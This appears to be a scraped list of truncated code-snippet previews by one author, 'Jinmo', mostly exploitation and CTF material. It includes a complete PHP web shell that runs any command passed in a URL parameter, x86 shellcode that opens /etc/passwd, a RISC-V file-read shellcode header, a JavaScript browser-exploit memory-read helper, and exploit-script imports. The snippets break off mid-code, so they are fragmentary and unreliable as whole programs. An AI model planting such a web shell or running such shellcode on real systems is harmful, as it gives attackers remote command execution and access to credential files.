Jinmo

#include "pin.H"
#include <stdio.h>

FILE *out_fp;
VOID TraceMove(VOID *addr) {
	fprintf(out_fp, "%p: MOV Here!\n", addr);
}

VOID INSAnalysis(INS ins, VOID *v) {
	if (INS_Opcode(ins) == XED_ICLASS_MOV)

Jinmo

<?php
 echo 'Shell launched!\n';
 system($_GET[cmd]);
?>

Jinmo

jmp a
b:
pop ebx
xor ecx, ecx
xor edx, edx
lea eax, [ecx+5]
int 0x80
xchg eax, ecx
mov al, 187
lea ebx, [edx+1]

Jinmo

# file read shellcode
# riscv
# - buffer: pc + 0x100, must be writable
# - if you want, you can change it

# compile:
# export PATH=$PATH:/opt/riscv/bin
# riscv64-unknown-elf-as code.s -o code.o
# riscv64-unknown-elf-objcopy --dump-section .text=code.dump code.o
# output: code.dump

Jinmo

<html>
<head>
<script type="text/javascript">
function qs(addr, read) {
	var s = '';
	var i;
	var c = 0;
	for(i = 0; i < 50; i++) {
		c = (read(addr + i - 2) >> 16) & 0xff;
		if(c == 0) return s;

Jinmo

function check_space {
	if [[ $1 == *[bdks';''&'' ']* ]]
	then 	
    		return 0
	fi

	return 1
}

while :

Jinmo

#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <strings.h>
#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
	char buf[256];
	int sockfd = socket(2, 1, 0);

Jinmo

.intel_syntax noprefix
.globl _start
_start:
xor ecx, ecx
mul ecx
push ecx
push 0x64777373
push 0x61702f63
push 0x74652f2f
mov al, 5

Jinmo

import itertools
import struct

# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
 
# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \

Jinmo

from transaction_pb2 import Transaction, Reply, Command
from rc4 import RC4 # https://github.com/bozhu/RC4-Python

import socket
import hexdump
import random
import struct
import telnetlib
import sys